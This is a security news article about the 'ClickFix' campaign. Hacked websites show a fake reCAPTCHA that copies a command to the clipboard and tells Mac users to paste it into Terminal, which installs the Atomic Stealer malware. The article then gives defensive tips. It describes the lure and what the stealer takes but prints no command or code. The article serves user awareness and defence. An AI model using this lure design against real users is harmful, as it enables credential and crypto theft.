Monday, May 12, 2025
Latest:
News

Massive web-watering-hole campaign uncovered

HackAcademy

Massive web‑watering‑hole campaign uncovered

Security researchers at BadByte have identified more than 2,800 hacked websites funnelling Mac visitors into an infection chain dubbed “ClickFix.” The operation delivers the password‑stealing Atomic Stealer (AMOS) malware and is one of the largest macOS‑focused campaigns seen to date.

How ClickFix hijacks your Mac

  1. Bogus verification prompt – Victims land on a legitimate‑looking page that pops up a fake Google reCAPTCHA asking them to click “I’m not a robot.”

  2. Clipboard sleight‑of‑hand – The click silently copies an obfuscated command to the user’s clipboard.

  3. Social‑engineering twist – The pop‑up then instructs the user to open Terminal and paste the code “to complete verification.”

  4. Stealer delivered – Pressing Return triggers a curl command that downloads and executes Atomic Stealer.

Previous ClickFix waves targeted Windows PCs; this variant checks the visitor’s user‑agent string and aborts if it detects Windows or Linux, keeping its sights firmly on macOS.

What Atomic Stealer can grab

  • Keychain passwords and iCloud tokens

  • Cookies, autofill data and saved logins from Chrome, Firefox and Brave

  • Files in Desktop and Documents folders, including PDFs and crypto‑wallet seed phrases

  • Private keys and balances from more than 50 browser‑based and standalone crypto wallets

AMOS is sold on a malware‑as‑a‑service model for about US $3,000 per month, letting less‑skilled crooks run campaigns at scale.

Why it evades many defences

Because users themselves paste the command, the payload bypasses gateway filters and most macOS quarantine checks. Traditional AV engines often flag nothing until after the stealer executes. This human‑in‑the‑loop trick lets ClickFix slip through Apple’s built‑in XProtect signatures and some endpoint‑detection tools.

Staying safe: five quick wins

Step Why it matters
Close unexpected CAPTCHA pop‑ups immediately Real reCAPTCHAs never ask you to open Terminal.
Run the latest macOS and browser versions Each update expands XProtect and removes vulnerable WebKit components.
Install a reputable Mac AV with real‑time web filtering Adds behaviour‑based detection of clipboard‑injection tricks.
Use a standard (non‑admin) account for daily work Limits the damage if a rogue script executes.
Harden your crypto wallets Store seeds offline and enable passphrases to thwart automated grabs.

Bigger picture

ClickFix shows how effortless social engineering can trump sophisticated technical exploits. With thousands of legitimate domains hijacked, even security‑savvy users may stumble into the trap. Until browsers can reliably flag clipboard manipulations and fake CAPTCHA overlays, vigilance—and sharing these red flags with less‑technical friends and family—remains the best defence.

Bottom line: If a website ever tells you to copy code into Terminal to prove you’re human, you’re moments away from handing crooks your keys, cookies and crypto. Close the tab, clear your clipboard, and move on.

Photo Credit: DepositPhotos.com

Leave a Reply

Your email address will not be published. Required fields are marked *